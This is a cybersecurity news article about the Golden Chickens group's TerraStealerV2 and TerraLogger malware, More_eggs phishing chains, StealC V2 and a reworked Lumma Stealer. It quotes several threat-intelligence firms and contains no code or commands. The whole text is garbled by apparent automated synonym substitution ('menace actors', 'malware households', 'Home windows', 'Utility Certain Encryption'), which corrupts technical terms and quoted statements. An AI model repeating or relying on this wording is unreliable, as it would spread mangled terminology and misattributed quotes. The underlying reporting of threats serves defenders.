The menace actors often known as Golden Chickens have been attributed to 2 new malware households dubbed TerraStealerV2 and TerraLogger, suggesting continued improvement efforts to fine-tune and diversify their arsenal.
“TerraStealerV2 is designed to gather browser credentials, cryptocurrency pockets knowledge, and browser extension info,” Recorded Future Insikt Group stated. “TerraLogger, in contrast, is a standalone keylogger. It makes use of a typical low-level keyboard hook to document keystrokes and writes the logs to native recordsdata.”
Golden Chickens, often known as TA4557 and Venom Spider, is the title given to a financially motivated menace actor linked to a infamous malware household referred to as More_eggs. It is identified to be lively since not less than 2018, providing its warez underneath a malware-as-a-service (MaaS) mannequin.
Campaigns distributing More_eggs entail using spear-phishing emails to focus on hiring managers utilizing faux resumes, permitting attackers to steal confidential knowledge. Different marketing campaign waves have singled out professionals on LinkedIn with weaponized job affords to ship the malware.
Latest assault chains documented by Arctic Wolf have used phishing emails as a ploy to guide recipients to an actor-controlled web site from the place they will obtain a decoy resume, which is nothing however a Home windows Shortcut (.LNK) file that, in flip, makes use of a batch script to launch the lure doc whereas operating a JavaScript malware within the background.
The JavaScript payload acts as a conduit to deploy a More_eggs_Dropper, a DLL file that is designed to launch one other JavaScript malware referred to as TerraLoader. This malware is then used to decrypt and cargo More_eggs.
“The menace actor has demonstrated a continued funding within the improvement and upkeep of its backdoor infrastructure over time,” Arctic Wolf Labs stated. “That is evidenced by means of subtle code obfuscation and code encryption, which enhance its stealth and evasiveness in opposition to defenders.”
As of 2023, Golden Chickens has been attributed to an internet persona often known as badbullzvenom, an account that is believed to be operated collectively by people from Canada and Romania. A number of the different malicious instruments developed by the e-crime group embrace More_eggs lite (oka lite_more_eggs), VenomLNK, TerraLoader, and TerraCrypt.
Late final yr, Zscaler ThreatLabz detailed new Golden Chickens-related exercise involving a backdoor referred to as RevC2 and a loader known as Venom Loader, each of that are delivered through a VenomLNK.
The newest findings from Recorded Future present that the menace actors are persevering with to work on their choices, releasing an up to date model of their stealer malware that is able to harvesting knowledge from browsers, cryptocurrency wallets, and browser extensions.
TerraStealerV2 has been distributed through numerous codecs, equivalent to executable recordsdata (EXEs), dynamic-link libraries (DLLs), Home windows Installer packages (MSI), and shortcut (LNK) recordsdata.
In all these instances, the stealer payload is delivered within the type of an OCX (quick for Microsoft’s OLE Management Extension) payload that is retrieved from an exterior area (“wetransfers[.]io”).
“Whereas it targets the Chrome ‘Login Information’ database to steal credentials, it doesn’t bypass Utility Certain Encryption (ABE) protections launched in Chrome updates after July 2024, indicating the malware code is outdated or nonetheless underneath improvement,” the cybersecurity firm stated.
The info captured by TerraStealerV2 is exfiltrated to each Telegram and the area “wetransfers[.]io.” It additionally leverages trusted Home windows utilities, equivalent to regsvr32.exe and mshta.exe, to evade detection.
TerraLogger, additionally propagated as an OCX file, is engineered to document keystrokes. Nevertheless, it doesn’t embrace performance for knowledge exfiltration or command-and-control (C2) communication, suggesting it’s both in early improvement or meant for use together with one other malware a part of the Golden Chickens MaaS ecosystem.
“The present state of TerraStealerV2 and TerraLogger means that each instruments stay underneath lively improvement and don’t but exhibit the extent of stealth sometimes related to mature Golden Chickens tooling,” Recorded Future stated.
“Given Golden Chickens’ historical past of growing malware for credential theft and entry operations, these capabilities will possible proceed to evolve.”
The disclosure comes amid the emergence of recent stealer malware households like Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer that are designed to exfiltrate a variety of delicate info from its victims.
It additionally follows the invention of an up to date model of the StealC malware with assist for streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption.
“The malware’s payload supply choices have been expanded to incorporate Microsoft Software program Installer (MSI) packages and PowerShell scripts,” Zscaler ThreatLabz stated in a report revealed final week.
“A redesigned management panel gives an built-in builder that permits menace actors to customise payload supply guidelines primarily based on geolocation, {hardware} IDs (HWID), and put in software program. Extra options embrace multi-monitor screenshot seize, a unified file grabber, and server-side brute-forcing for credentials.”
The brand new 2.2.4. model (aka StealC V2), launched in March 2025, has been noticed being distributed through one other malware loader referred to as Amadey. The management panel additionally helps Telegram bot integration for sending notifications and permits customization of message codecs.
“StealC V2 introduces enhancements, equivalent to enhanced payload supply, a streamlined communications protocol with encryption, and a redesigned management panel that gives extra focused info assortment,” Zscaler stated.
It is not simply StealC that has acquired an replace. Cybersecurity researchers have additionally detected a reworked model of Lumma Stealer that is written in C++ and is distributed through the prevalent ClickFix social engineering method when customers seek for cracked software program, standard films, or the most recent music releases.
“LUMMAC.V2 is an infostealer malware that targets a variety of functions, together with browsers, crypto wallets, password managers, distant desktop functions, e mail shoppers, and on the spot messaging functions,” Google Safety Operations stated.
“It steals info equivalent to credentials, logins, emails, private and system particulars, screenshots, and cookies, subsequently sending this knowledge over HTTP in a ZIP archive.”
Discovered this text fascinating? Observe us on Twitter and LinkedIn to learn extra unique content material we put up.
